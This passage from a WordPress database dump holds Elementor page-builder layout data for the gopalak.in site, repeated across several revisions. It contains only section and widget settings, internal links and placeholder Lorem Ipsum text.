\",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(7885,1404,'_elementor_page_assets','a:0:{}'),(7897,1406,'_elementor_edit_mode','builder'),(7898,1406,'_elementor_template_type','wp-page'),(7899,1406,'_elementor_version','3.7.6'),(7900,1406,'_wp_page_template','elementor_canvas'),(7901,1406,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(7902,1406,'_elementor_page_assets','a:0:{}'),(7904,1407,'_elementor_edit_mode','builder'),(7905,1407,'_elementor_template_type','wp-page'),(7906,1407,'_elementor_version','3.7.6'),(7907,1407,'_wp_page_template','elementor_canvas'),(7908,1407,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, 